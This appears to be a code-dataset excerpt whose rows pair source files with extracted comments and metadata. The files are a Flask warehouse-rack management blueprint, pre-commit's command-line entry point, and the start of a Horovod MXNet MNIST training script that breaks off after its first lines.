| NaiveBayesClassifier.py | 13,443 | implementing the stop words and used by bag of words to create the vocab dictionaryprint(len(reviewList))print("Word bank for reviews: \n{0} \n".format(vocabTokens));print(len(vocabTokens))bagOfWords(reviewFile)print(len(reviewList))print(len(vocabTokens))matrix = numpy.zeros(shape = (len(reviewList),len(vocabTokens)))bagList = numpy.zeros(len(vocabTokens))if word in vocabTokens:bagList[vocabTokens.index(word)] +=1print(i, " out of ", len(vocabTokens), " done")matrix[i] = bagListprint("{0}\n{1}\n".format(review,numpy.array(bagList)))print(len(reviewList))bagList = numpy.zeros(len(vocabTokens))print("Gauss: ", i)calculates the mean and varience using bag of words using bag of wordsprint(meanVarTouple[0])print("Gauss: ", meanVarTouple)prediction will be used for the accuracy of the classifierprint(len(reviewList))print("TFidf: ", i)print(i)using the tf vlues in the sparse matrix and idf values in the vocab dict we can get the tf idf and hold it in sparse matrixprint(sparseMatrixTFIDF)prediction will be used for the accuracy of the classifierprediction will be used for the accuracy of the classifiergetting the dict, word count and review count for pos and neg from BOWalpha is the smoothing paramater, through trial i found that a valueof 18 will have the highest prediction frequencycalculating the prior log prob for pos and negsetting the argumentsgetting the accuracy for multinomial for pos test and neg testcalculating the average accuracy and printing it outcalcMean_Var(train_pos,1)tf_idf(train_pos) | 1,522 | en | 0.608356 |
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: rack.py
@time: 2018-04-06 18:22
"""
from __future__ import unicode_literals
from datetime import datetime
from flask import (
request,
flash,
render_template,
url_for,
redirect,
abort,
jsonify,
Blueprint,
)
from flask_babel import gettext as _
from flask_login import login_required
from app_backend import app
from app_backend import excel
from app_backend.api.inventory import count_inventory
from app_backend.api.rack import (
get_rack_pagination,
get_rack_row_by_id,
add_rack,
edit_rack,
get_rack_choices,
# rack_current_stats,
# rack_former_stats,
)
from app_backend.api.rack import (
get_rack_rows,
# get_distinct_brand,
)
from app_backend.api.warehouse import (
get_warehouse_choices,
)
from app_backend.forms.rack import (
RackSearchForm,
RackAddForm,
RackEditForm,
)
from app_backend.models.model_bearing import Rack
from app_backend.permissions.rack import (
permission_rack_section_add,
permission_rack_section_search,
permission_rack_section_export,
permission_rack_section_get,
permission_rack_section_edit,
permission_rack_section_del,
)
from app_common.maps.default import DEFAULT_SEARCH_CHOICES_INT_OPTION
from app_common.maps.operations import OPERATION_EXPORT, OPERATION_DELETE
from app_common.maps.status_delete import (
STATUS_DEL_OK,
STATUS_DEL_NO)
# 定义蓝图
bp_rack = Blueprint('rack', __name__, url_prefix='/rack')
# 加载配置
DOCUMENT_INFO = app.config.get('DOCUMENT_INFO', {})
PER_PAGE_BACKEND = app.config.get('PER_PAGE_BACKEND', 20)
AJAX_SUCCESS_MSG = app.config.get('AJAX_SUCCESS_MSG', {'result': True})
AJAX_FAILURE_MSG = app.config.get('AJAX_FAILURE_MSG', {'result': False})
@bp_rack.route('/lists.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_search.require(http_exception=403)
def lists():
    """
    Rack list page.

    GET renders the paginated list.  POST applies the search form and,
    depending on the ``op`` field, may also export the filtered rows as CSV
    or soft-delete the selected racks.

    :return: rendered template or CSV export response
    """
    template_name = 'rack/lists.html'
    # Document info (page title, etc.)
    document_info = DOCUMENT_INFO.copy()
    document_info['TITLE'] = _('rack lists')
    # Search conditions (soft-deleted rows are always excluded)
    form = RackSearchForm(request.form)
    form.warehouse_id.choices = get_warehouse_choices()
    # app.logger.info('')
    search_condition = [
        Rack.status_delete == STATUS_DEL_NO,
    ]
    if request.method == 'POST':
        # Form validation failed
        if not form.validate_on_submit():
            flash(_('Search Failure'), 'danger')
            # Surface csrf_token errors individually.
            # BUGFIX: the original used map(), which is lazy on Python 3, so
            # flash() was never actually called; use an explicit loop instead.
            if hasattr(form, 'csrf_token') and getattr(form, 'csrf_token').errors:
                for csrf_error in form.csrf_token.errors:
                    flash(csrf_error, 'danger')
        else:
            if form.warehouse_id.data != DEFAULT_SEARCH_CHOICES_INT_OPTION:
                search_condition.append(Rack.warehouse_id == form.warehouse_id.data)
            if form.name.data:
                search_condition.append(Rack.name == form.name.data)
            # Handle export
            if form.op.data == OPERATION_EXPORT:
                # Check export permission
                if not permission_rack_section_export.can():
                    abort(403)
                column_names = Rack.__table__.columns.keys()
                query_sets = get_rack_rows(*search_condition)
                return excel.make_response_from_query_sets(
                    query_sets=query_sets,
                    column_names=column_names,
                    file_type='csv',
                    file_name='%s.csv' % _('rack lists')
                )
            # Bulk delete
            if form.op.data == OPERATION_DELETE:
                # Check delete permission
                if not permission_rack_section_del.can():
                    abort(403)
                rack_ids = request.form.getlist('rack_id')
                permitted = True
                for rack_id in rack_ids:
                    # Refuse to delete racks that still hold inventory
                    if count_inventory(**{'rack_id': rack_id, 'status_delete': STATUS_DEL_NO}):
                        ext_msg = _('Currently In Use')
                        flash(_('Del Failure, %(ext_msg)s', ext_msg=ext_msg), 'danger')
                        permitted = False
                        break
                if permitted:
                    result_total = True
                    for rack_id in rack_ids:
                        current_time = datetime.utcnow()
                        rack_data = {
                            'status_delete': STATUS_DEL_OK,
                            'delete_time': current_time,
                            'update_time': current_time,
                        }
                        result = edit_rack(rack_id, rack_data)
                        result_total = result_total and result
                    if result_total:
                        flash(_('Del Success'), 'success')
                    else:
                        flash(_('Del Failure'), 'danger')
    # Pagination data
    pagination = get_rack_pagination(form.page.data, PER_PAGE_BACKEND, *search_condition)
    # Render template
    return render_template(
        template_name,
        form=form,
        pagination=pagination,
        **document_info
    )
@bp_rack.route('/<int:rack_id>/info.html')
@login_required
@permission_rack_section_get.require(http_exception=403)
def info(rack_id):
    """
    Rack detail page.

    :param rack_id: primary key of the rack to display
    :return: rendered detail template
    """
    row = get_rack_row_by_id(rack_id)
    # Unknown id -> 404; soft-deleted row -> 410 (Gone).
    if not row:
        abort(404)
    if row.status_delete == STATUS_DEL_OK:
        abort(410)
    # Document info (page title, etc.)
    page_meta = dict(DOCUMENT_INFO)
    page_meta['TITLE'] = _('rack info')
    return render_template('rack/info.html', rack_info=row, **page_meta)
@bp_rack.route('/add.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_add.require(http_exception=403)
def add():
    """
    Create a rack.

    GET renders an empty form; POST validates it and inserts the new row.

    :return: rendered form template, or a redirect on success
    """
    template_name = 'rack/add.html'
    # Document info (page title, etc.)
    page_meta = dict(DOCUMENT_INFO)
    page_meta['TITLE'] = _('rack add')
    # Creation form
    form = RackAddForm(request.form)
    form.warehouse_id.choices = get_warehouse_choices(option_type='create')

    def render_form():
        # Shared renderer for the initial page and for the failure paths.
        return render_template(
            template_name,
            form=form,
            **page_meta
        )

    # GET: just show the empty form.
    if request.method == 'GET':
        return render_form()
    # POST: validate, then insert.
    if not form.validate_on_submit():
        flash(_('Add Failure'), 'danger')
        return render_form()
    now = datetime.utcnow()
    new_row = {
        'warehouse_id': form.warehouse_id.data,
        'name': form.name.data,
        'create_time': now,
        'update_time': now,
    }
    if add_rack(new_row):
        # Creation succeeded
        flash(_('Add Success'), 'success')
        return redirect(request.args.get('next') or url_for('rack.lists'))
    # Creation failed
    flash(_('Add Failure'), 'danger')
    return render_form()
@bp_rack.route('/<int:rack_id>/edit.html', methods=['GET', 'POST'])
@login_required
@permission_rack_section_edit.require(http_exception=403)
def edit(rack_id):
    """
    Edit a rack.

    :param rack_id: primary key of the rack to edit
    :return: rendered edit template, or a redirect on success
    """
    rack_info = get_rack_row_by_id(rack_id)
    # Check the resource exists
    if not rack_info:
        abort(404)
    # Check the resource has not been soft-deleted
    if rack_info.status_delete == STATUS_DEL_OK:
        abort(410)
    template_name = 'rack/edit.html'
    # Load the edit form
    form = RackEditForm(request.form)
    form.warehouse_id.choices = get_warehouse_choices(option_type='update')
    # Document info (page title, etc.)
    document_info = DOCUMENT_INFO.copy()
    document_info['TITLE'] = _('rack edit')
    # GET: show the edit page
    if request.method == 'GET':
        # Pre-fill the form from the current row
        form.warehouse_id.data = rack_info.warehouse_id
        form.name.data = rack_info.name
        # form.create_time.data = rack_info.create_time
        # form.update_time.data = rack_info.update_time
        # Render the page
        return render_template(
            template_name,
            rack_id=rack_id,
            form=form,
            **document_info
        )
    # POST: handle the edit request
    if request.method == 'POST':
        # Form validation failed
        if not form.validate_on_submit():
            flash(_('Edit Failure'), 'danger')
            return render_template(
                template_name,
                rack_id=rack_id,
                form=form,
                **document_info
            )
        # Form validation succeeded
        current_time = datetime.utcnow()
        rack_data = {
            'warehouse_id': form.warehouse_id.data,
            'name': form.name.data,
            'update_time': current_time,
        }
        result = edit_rack(rack_id, rack_data)
        # Edit succeeded
        if result:
            flash(_('Edit Success'), 'success')
            return redirect(request.args.get('next') or url_for('rack.lists'))
        # Edit failed
        else:
            flash(_('Edit Failure'), 'danger')
            return render_template(
                template_name,
                rack_id=rack_id,
                form=form,
                **document_info
            )
@bp_rack.route('/ajax/del', methods=['GET', 'POST'])
@login_required
def ajax_delete():
    """
    Soft-delete a rack via AJAX.

    :return: JSON message describing success or the failure reason
    """
    ajax_success_msg = AJAX_SUCCESS_MSG.copy()
    ajax_failure_msg = AJAX_FAILURE_MSG.copy()
    # Check delete permission
    if not permission_rack_section_del.can():
        ext_msg = _('Permission Denied')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    # Check the request method.
    # FIX: request.is_xhr was deprecated and removed in Flask/Werkzeug 2.0;
    # test the X-Requested-With header directly (this is exactly what
    # is_xhr used to do).
    is_xhr = request.headers.get('X-Requested-With') == 'XMLHttpRequest'
    if not (request.method == 'GET' and is_xhr):
        ext_msg = _('Method Not Allowed')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    # Check request arguments
    rack_id = request.args.get('rack_id', 0, type=int)
    if not rack_id:
        ext_msg = _('ID does not exist')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    rack_info = get_rack_row_by_id(rack_id)
    # Check the resource exists
    if not rack_info:
        ext_msg = _('ID does not exist')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    # Check the resource is not already deleted
    if rack_info.status_delete == STATUS_DEL_OK:
        ext_msg = _('Already deleted')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    # Refuse to delete a rack that still holds inventory
    if count_inventory(**{'rack_id': rack_id, 'status_delete': STATUS_DEL_NO}):
        ext_msg = _('Currently In Use')
        ajax_failure_msg['msg'] = _('Del Failure, %(ext_msg)s', ext_msg=ext_msg)
        return jsonify(ajax_failure_msg)
    current_time = datetime.utcnow()
    rack_data = {
        'status_delete': STATUS_DEL_OK,
        'delete_time': current_time,
        'update_time': current_time,
    }
    result = edit_rack(rack_id, rack_data)
    if result:
        ajax_success_msg['msg'] = _('Del Success')
        return jsonify(ajax_success_msg)
    else:
        ajax_failure_msg['msg'] = _('Del Failure')
        return jsonify(ajax_failure_msg)
@bp_rack.route('/ajax/get_rack_choices', methods=['GET', 'POST'])
@login_required
def ajax_get_rack_choices():
    """
    Rack options for a warehouse (AJAX).

    :return: JSON list of rack choices for the given warehouse
    """
    wid = request.args.get('warehouse_id', 0, type=int)
    return jsonify(get_rack_choices(wid))
# @bp_rack.route('/ajax/stats', methods=['GET', 'POST'])
# @login_required
# def ajax_stats():
# """
# 获取货架统计
# :return:
# """
# time_based = request.args.get('time_based', 'hour')
# result_rack_current = rack_current_stats(time_based)
# result_rack_former = rack_former_stats(time_based)
#
# line_chart_data = {
# 'labels': [label for label, _ in result_rack_current],
# 'datasets': [
# {
# 'label': '在职',
# 'backgroundColor': 'rgba(220,220,220,0.5)',
# 'borderColor': 'rgba(220,220,220,1)',
# 'pointBackgroundColor': 'rgba(220,220,220,1)',
# 'pointBorderColor': '#fff',
# 'pointBorderWidth': 2,
# 'data': [data for _, data in result_rack_current]
# },
# {
# 'label': '离职',
# 'backgroundColor': 'rgba(151,187,205,0.5)',
# 'borderColor': 'rgba(151,187,205,1)',
# 'pointBackgroundColor': 'rgba(151,187,205,1)',
# 'pointBorderColor': '#fff',
# 'pointBorderWidth': 2,
# 'data': [data for _, data in result_rack_former]
# }
# ]
# }
# return json.dumps(line_chart_data, default=json_default)
#
#
# @bp_rack.route('/stats.html')
# @login_required
# @permission_rack_section_stats.require(http_exception=403)
# def stats():
# """
# 货架统计
# :return:
# """
# # 统计数据
# time_based = request.args.get('time_based', 'hour')
# if time_based not in ['hour', 'date', 'month']:
# abort(404)
# # 文档信息
# document_info = DOCUMENT_INFO.copy()
# document_info['TITLE'] = _('rack stats')
# # 渲染模板
# return render_template(
# 'rack/stats.html',
# time_based=time_based,
# **document_info
# )
#
#
# @bp_rack.route('/<int:rack_id>/stats.html')
# @login_required
# @permission_rack_section_stats.require(http_exception=403)
# def stats_item(rack_id):
# """
# 货架统计明细
# :param rack_id:
# :return:
# """
# rack_info = get_rack_row_by_id(rack_id)
# # 检查资源是否存在
# if not rack_info:
# abort(404)
# # 检查资源是否删除
# if rack_info.status_delete == STATUS_DEL_OK:
# abort(410)
#
# # 统计数据
# rack_stats_item_info = get_rack_row_by_id(rack_id)
# # 文档信息
# document_info = DOCUMENT_INFO.copy()
# document_info['TITLE'] = _('rack stats item')
# # 渲染模板
# return render_template(
# 'rack/stats_item.html',
# rack_stats_item_info=rack_stats_item_info,
# **document_info
# )
| app_backend/views/rack.py | 14,948 | 创建货架
:return:
货架删除
:return:
货架选项
:return:
货架编辑
货架详情
:param rack_id:
:return:
货架列表
:return:
@author: zhanghe
@software: PyCharm
@file: rack.py
@time: 2018-04-06 18:22
!/usr/bin/env python encoding: utf-8 rack_current_stats, rack_former_stats, get_distinct_brand, 定义蓝图 加载配置 文档信息 搜索条件 app.logger.info('') 表单校验失败 单独处理csrf_token 处理导出 检查导出权限 批量删除 检查删除权限 检查是否正在使用 库存 翻页数据 渲染模板 详情数据 检查资源是否存在 检查资源是否删除 文档信息 渲染模板 文档信息 加载创建表单 进入创建页面 渲染页面 处理创建请求 表单校验失败 表单校验成功 创建操作成功 创建操作失败 检查资源是否存在 检查资源是否删除 加载编辑表单 文档信息 进入编辑页面 表单赋值 form.create_time.data = rack_info.create_time form.update_time.data = rack_info.update_time 渲染页面 处理编辑请求 表单校验失败 表单校验成功 编辑操作成功 编辑操作失败 检查删除权限 检查请求方法 检查请求参数 检查资源是否存在 检查资源是否删除 检查是否正在使用 库存 @bp_rack.route('/ajax/stats', methods=['GET', 'POST']) @login_required def ajax_stats(): """ 获取货架统计 :return: """ time_based = request.args.get('time_based', 'hour') result_rack_current = rack_current_stats(time_based) result_rack_former = rack_former_stats(time_based) line_chart_data = { 'labels': [label for label, _ in result_rack_current], 'datasets': [ { 'label': '在职', 'backgroundColor': 'rgba(220,220,220,0.5)', 'borderColor': 'rgba(220,220,220,1)', 'pointBackgroundColor': 'rgba(220,220,220,1)', 'pointBorderColor': 'fff', 'pointBorderWidth': 2, 'data': [data for _, data in result_rack_current] }, { 'label': '离职', 'backgroundColor': 'rgba(151,187,205,0.5)', 'borderColor': 'rgba(151,187,205,1)', 'pointBackgroundColor': 'rgba(151,187,205,1)', 'pointBorderColor': 'fff', 'pointBorderWidth': 2, 'data': [data for _, data in result_rack_former] } ] } return json.dumps(line_chart_data, default=json_default) @bp_rack.route('/stats.html') @login_required @permission_rack_section_stats.require(http_exception=403) def stats(): """ 货架统计 :return: """ 统计数据 time_based = request.args.get('time_based', 'hour') if time_based not in ['hour', 'date', 'month']: abort(404) 文档信息 document_info = DOCUMENT_INFO.copy() document_info['TITLE'] = _('rack stats') 渲染模板 return render_template( 'rack/stats.html', time_based=time_based, **document_info ) @bp_rack.route('/<int:rack_id>/stats.html') @login_required @permission_rack_section_stats.require(http_exception=403) def 
stats_item(rack_id): """ 货架统计明细 :param rack_id: :return: """ rack_info = get_rack_row_by_id(rack_id) 检查资源是否存在 if not rack_info: abort(404) 检查资源是否删除 if rack_info.status_delete == STATUS_DEL_OK: abort(410) 统计数据 rack_stats_item_info = get_rack_row_by_id(rack_id) 文档信息 document_info = DOCUMENT_INFO.copy() document_info['TITLE'] = _('rack stats item') 渲染模板 return render_template( 'rack/stats_item.html', rack_stats_item_info=rack_stats_item_info, **document_info ) | 3,155 | zh | 0.373247 |
import argparse
import logging
import os
import sys
from typing import Any
from typing import Optional
from typing import Sequence
from typing import Union
import pre_commit.constants as C
from pre_commit import color
from pre_commit import git
from pre_commit.commands.autoupdate import autoupdate
from pre_commit.commands.clean import clean
from pre_commit.commands.gc import gc
from pre_commit.commands.hook_impl import hook_impl
from pre_commit.commands.init_templatedir import init_templatedir
from pre_commit.commands.install_uninstall import install
from pre_commit.commands.install_uninstall import install_hooks
from pre_commit.commands.install_uninstall import uninstall
from pre_commit.commands.migrate_config import migrate_config
from pre_commit.commands.run import run
from pre_commit.commands.sample_config import sample_config
from pre_commit.commands.try_repo import try_repo
from pre_commit.error_handler import error_handler
from pre_commit.error_handler import FatalError
from pre_commit.logging_handler import logging_handler
from pre_commit.store import Store
from pre_commit.util import CalledProcessError
# Module-level logger shared by the whole package entry point.
logger = logging.getLogger('pre_commit')
# https://github.com/pre-commit/pre-commit/issues/217
# On OSX, making a virtualenv using pyvenv at . causes `virtualenv` and `pip`
# to install packages to the wrong place. We don't want anything to deal with
# pyvenv
os.environ.pop('__PYVENV_LAUNCHER__', None)
# Subcommands that may run outside a git checkout (no chdir to the repo root).
COMMANDS_NO_GIT = {'clean', 'gc', 'init-templatedir', 'sample-config'}
def _add_color_option(parser: argparse.ArgumentParser) -> None:
    """Attach the shared ``--color`` flag to *parser*."""
    # e.g. "{auto,always,never}" built from the supported choices.
    choices_metavar = '{%s}' % ','.join(color.COLOR_CHOICES)
    parser.add_argument(
        '--color',
        default=os.environ.get('PRE_COMMIT_COLOR', 'auto'),
        type=color.use_color,
        metavar=choices_metavar,
        help='Whether to use color in output. Defaults to `%(default)s`.',
    )
def _add_config_option(parser: argparse.ArgumentParser) -> None:
    """Attach the shared ``-c/--config`` flag to *parser*."""
    parser.add_argument(
        '-c',
        '--config',
        default=C.CONFIG_FILE,
        help='Path to alternate config file',
    )
class AppendReplaceDefault(argparse.Action):
    """``append``-style action that discards the declared default on first use.

    The stock ``append`` action extends the default list; this variant
    replaces it with a fresh list the first time the option appears, so the
    default only applies when the option is completely absent.
    """

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        super().__init__(*args, **kwargs)
        # Becomes True once the default has been replaced.
        self.appended = False

    def __call__(
        self,
        parser: argparse.ArgumentParser,
        namespace: argparse.Namespace,
        values: Union[str, Sequence[str], None],
        option_string: Optional[str] = None,
    ) -> None:
        if self.appended:
            bucket = getattr(namespace, self.dest)
        else:
            # First occurrence: throw away the default before collecting.
            bucket = []
            setattr(namespace, self.dest, bucket)
            self.appended = True
        bucket.append(values)
def _add_hook_type_option(parser: argparse.ArgumentParser) -> None:
    """Attach the repeatable ``-t/--hook-type`` option to *parser*."""
    supported_hooks = (
        'pre-commit', 'pre-merge-commit', 'pre-push',
        'prepare-commit-msg', 'commit-msg', 'post-checkout',
    )
    parser.add_argument(
        '-t', '--hook-type',
        choices=supported_hooks,
        action=AppendReplaceDefault,
        default=['pre-commit'],
        dest='hook_types',
    )
def _add_run_options(parser: argparse.ArgumentParser) -> None:
    """Attach the options shared by the `run` and `try-repo` commands."""
    parser.add_argument('hook', nargs='?', help='A single hook-id to run')
    parser.add_argument('--verbose', '-v', action='store_true', default=False)
    # --all-files and --files are mutually exclusive file selectors.
    mutex_group = parser.add_mutually_exclusive_group(required=False)
    mutex_group.add_argument(
        '--all-files', '-a', action='store_true', default=False,
        help='Run on all the files in the repo.',
    )
    mutex_group.add_argument(
        '--files', nargs='*', default=[],
        help='Specific filenames to run hooks on.',
    )
    parser.add_argument(
        '--show-diff-on-failure', action='store_true',
        help='When hooks fail, run `git diff` directly afterward.',
    )
    parser.add_argument(
        '--hook-stage', choices=C.STAGES, default='commit',
        help='The stage during which the hook is fired. One of %(choices)s',
    )
    # The following mirror the arguments git passes to its native hooks.
    parser.add_argument(
        '--from-ref', '--source', '-s',
        help=(
            '(for usage with `--from-ref`) -- this option represents the '
            'original ref in a `from_ref...to_ref` diff expression. '
            'For `pre-push` hooks, this represents the branch you are pushing '
            'to. '
            'For `post-checkout` hooks, this represents the branch that was '
            'previously checked out.'
        ),
    )
    parser.add_argument(
        '--to-ref', '--origin', '-o',
        help=(
            '(for usage with `--to-ref`) -- this option represents the '
            'destination ref in a `from_ref...to_ref` diff expression. '
            'For `pre-push` hooks, this represents the branch being pushed. '
            'For `post-checkout` hooks, this represents the branch that is '
            'now checked out.'
        ),
    )
    parser.add_argument(
        '--commit-msg-filename',
        help='Filename to check when running during `commit-msg`',
    )
    parser.add_argument(
        '--remote-name', help='Remote name used by `git push`.',
    )
    parser.add_argument('--remote-url', help='Remote url used by `git push`.')
    parser.add_argument(
        '--checkout-type',
        help=(
            'Indicates whether the checkout was a branch checkout '
            '(changing branches, flag=1) or a file checkout (retrieving a '
            'file from the index, flag=0).'
        ),
    )
def _adjust_args_and_chdir(args: argparse.Namespace) -> None:
    """Normalize path arguments and chdir to the git repository root.

    Paths given relative to the invocation directory are made absolute
    first, then re-relativized after chdir'ing to the repo toplevel, so
    they stay valid from the new working directory.

    Raises FatalError when git is unavailable or the toplevel is bogus.
    """
    # `--config` was specified relative to the non-root working directory
    if os.path.exists(args.config):
        args.config = os.path.abspath(args.config)
    if args.command in {'run', 'try-repo'}:
        args.files = [os.path.abspath(filename) for filename in args.files]
    if args.command == 'try-repo' and os.path.exists(args.repo):
        args.repo = os.path.abspath(args.repo)
    try:
        toplevel = git.get_root()
    except CalledProcessError:
        raise FatalError(
            'git failed. Is it installed, and are you in a Git repository '
            'directory?',
        )
    else:
        if toplevel == '':  # pragma: no cover (old git)
            raise FatalError(
                'git toplevel unexpectedly empty! make sure you are not '
                'inside the `.git` directory of your repository.',
            )
        else:
            os.chdir(toplevel)
    # Back to relative paths, now anchored at the repository root.
    args.config = os.path.relpath(args.config)
    if args.command in {'run', 'try-repo'}:
        args.files = [os.path.relpath(filename) for filename in args.files]
    if args.command == 'try-repo' and os.path.exists(args.repo):
        args.repo = os.path.relpath(args.repo)
def main(argv: Optional[Sequence[str]] = None) -> int:
    """CLI entry point: build the argument parser and dispatch to a command.

    :param argv: argument vector (defaults to ``sys.argv[1:]``)
    :return: the command's exit code
    """
    argv = argv if argv is not None else sys.argv[1:]
    parser = argparse.ArgumentParser(prog='pre-commit')
    # https://stackoverflow.com/a/8521644/812183
    parser.add_argument(
        '-V', '--version',
        action='version',
        version=f'%(prog)s {C.VERSION}',
    )
    subparsers = parser.add_subparsers(dest='command')
    # --- one subparser per command ---
    autoupdate_parser = subparsers.add_parser(
        'autoupdate',
        help="Auto-update pre-commit config to the latest repos' versions.",
    )
    _add_color_option(autoupdate_parser)
    _add_config_option(autoupdate_parser)
    autoupdate_parser.add_argument(
        '--bleeding-edge', action='store_true',
        help=(
            'Update to the bleeding edge of `master` instead of the latest '
            'tagged version (the default behavior).'
        ),
    )
    autoupdate_parser.add_argument(
        '--freeze', action='store_true',
        help='Store "frozen" hashes in `rev` instead of tag names',
    )
    autoupdate_parser.add_argument(
        '--repo', dest='repos', action='append', metavar='REPO',
        help='Only update this repository -- may be specified multiple times.',
    )
    clean_parser = subparsers.add_parser(
        'clean', help='Clean out pre-commit files.',
    )
    _add_color_option(clean_parser)
    _add_config_option(clean_parser)
    # hook-impl is the internal command invoked by the installed git hook.
    hook_impl_parser = subparsers.add_parser('hook-impl')
    _add_color_option(hook_impl_parser)
    _add_config_option(hook_impl_parser)
    hook_impl_parser.add_argument('--hook-type')
    hook_impl_parser.add_argument('--hook-dir')
    hook_impl_parser.add_argument(
        '--skip-on-missing-config', action='store_true',
    )
    hook_impl_parser.add_argument(dest='rest', nargs=argparse.REMAINDER)
    gc_parser = subparsers.add_parser('gc', help='Clean unused cached repos.')
    _add_color_option(gc_parser)
    _add_config_option(gc_parser)
    init_templatedir_parser = subparsers.add_parser(
        'init-templatedir',
        help=(
            'Install hook script in a directory intended for use with '
            '`git config init.templateDir`.'
        ),
    )
    _add_color_option(init_templatedir_parser)
    _add_config_option(init_templatedir_parser)
    init_templatedir_parser.add_argument(
        'directory', help='The directory in which to write the hook script.',
    )
    _add_hook_type_option(init_templatedir_parser)
    install_parser = subparsers.add_parser(
        'install', help='Install the pre-commit script.',
    )
    _add_color_option(install_parser)
    _add_config_option(install_parser)
    install_parser.add_argument(
        '-f', '--overwrite', action='store_true',
        help='Overwrite existing hooks / remove migration mode.',
    )
    install_parser.add_argument(
        '--install-hooks', action='store_true',
        help=(
            'Whether to install hook environments for all environments '
            'in the config file.'
        ),
    )
    _add_hook_type_option(install_parser)
    install_parser.add_argument(
        '--allow-missing-config', action='store_true', default=False,
        help=(
            'Whether to allow a missing `pre-commit` configuration file '
            'or exit with a failure code.'
        ),
    )
    install_hooks_parser = subparsers.add_parser(
        'install-hooks',
        help=(
            'Install hook environments for all environments in the config '
            'file. You may find `pre-commit install --install-hooks` more '
            'useful.'
        ),
    )
    _add_color_option(install_hooks_parser)
    _add_config_option(install_hooks_parser)
    migrate_config_parser = subparsers.add_parser(
        'migrate-config',
        help='Migrate list configuration to new map configuration.',
    )
    _add_color_option(migrate_config_parser)
    _add_config_option(migrate_config_parser)
    run_parser = subparsers.add_parser('run', help='Run hooks.')
    _add_color_option(run_parser)
    _add_config_option(run_parser)
    _add_run_options(run_parser)
    sample_config_parser = subparsers.add_parser(
        'sample-config', help=f'Produce a sample {C.CONFIG_FILE} file',
    )
    _add_color_option(sample_config_parser)
    _add_config_option(sample_config_parser)
    try_repo_parser = subparsers.add_parser(
        'try-repo',
        help='Try the hooks in a repository, useful for developing new hooks.',
    )
    _add_color_option(try_repo_parser)
    _add_config_option(try_repo_parser)
    try_repo_parser.add_argument(
        'repo', help='Repository to source hooks from.',
    )
    try_repo_parser.add_argument(
        '--ref', '--rev',
        help=(
            'Manually select a rev to run against, otherwise the `HEAD` '
            'revision will be used.'
        ),
    )
    _add_run_options(try_repo_parser)
    uninstall_parser = subparsers.add_parser(
        'uninstall', help='Uninstall the pre-commit script.',
    )
    _add_color_option(uninstall_parser)
    _add_config_option(uninstall_parser)
    _add_hook_type_option(uninstall_parser)
    help = subparsers.add_parser(
        'help', help='Show help for a specific command.',
    )
    help.add_argument('help_cmd', nargs='?', help='Command to show help for.')
    # argparse doesn't really provide a way to use a `default` subparser
    if len(argv) == 0:
        argv = ['run']
    args = parser.parse_args(argv)
    # `help CMD` delegates to the subcommand's own --help output.
    if args.command == 'help' and args.help_cmd:
        parser.parse_args([args.help_cmd, '--help'])
    elif args.command == 'help':
        parser.parse_args(['--help'])
    with error_handler(), logging_handler(args.color):
        if args.command not in COMMANDS_NO_GIT:
            # Most commands must run from the repository root.
            _adjust_args_and_chdir(args)
        git.check_for_cygwin_mismatch()
        store = Store()
        store.mark_config_used(args.config)
        # --- dispatch to the selected command ---
        if args.command == 'autoupdate':
            return autoupdate(
                args.config, store,
                tags_only=not args.bleeding_edge,
                freeze=args.freeze,
                repos=args.repos,
            )
        elif args.command == 'clean':
            return clean(store)
        elif args.command == 'gc':
            return gc(store)
        elif args.command == 'hook-impl':
            return hook_impl(
                store,
                config=args.config,
                color=args.color,
                hook_type=args.hook_type,
                hook_dir=args.hook_dir,
                skip_on_missing_config=args.skip_on_missing_config,
                args=args.rest[1:],
            )
        elif args.command == 'install':
            return install(
                args.config, store,
                hook_types=args.hook_types,
                overwrite=args.overwrite,
                hooks=args.install_hooks,
                skip_on_missing_config=args.allow_missing_config,
            )
        elif args.command == 'init-templatedir':
            return init_templatedir(
                args.config, store, args.directory,
                hook_types=args.hook_types,
            )
        elif args.command == 'install-hooks':
            return install_hooks(args.config, store)
        elif args.command == 'migrate-config':
            return migrate_config(args.config)
        elif args.command == 'run':
            return run(args.config, store, args)
        elif args.command == 'sample-config':
            return sample_config()
        elif args.command == 'try-repo':
            return try_repo(args)
        elif args.command == 'uninstall':
            return uninstall(hook_types=args.hook_types)
        else:
            raise NotImplementedError(
                f'Command {args.command} not implemented.',
            )
    raise AssertionError(
        f'Command {args.command} failed to exit with a returncode',
    )
# Allow direct execution (e.g. `python -m pre_commit.main`).
if __name__ == '__main__':
    exit(main())
| pre_commit/main.py | 14,543 | https://github.com/pre-commit/pre-commit/issues/217 On OSX, making a virtualenv using pyvenv at . causes `virtualenv` and `pip` to install packages to the wrong place. We don't want anything to deal with pyvenv `--config` was specified relative to the non-root working directory pragma: no cover (old git) https://stackoverflow.com/a/8521644/812183 argparse doesn't really provide a way to use a `default` subparser | 416 | en | 0.821993 |
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.:wq
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import logging
import os
import zipfile
import time
import mxnet as mx
import horovod.mxnet as hvd
from mxnet import autograd, gluon, nd
from mxnet.test_utils import download
def main():
    """Train a small CNN on MNIST with Horovod data-parallelism.

    Reads hyper-parameters from the module-level ``args`` namespace,
    which is parsed in the ``__main__`` block below.
    """
    # Function to get mnist iterator given a rank
    def get_mnist_iterator(rank):
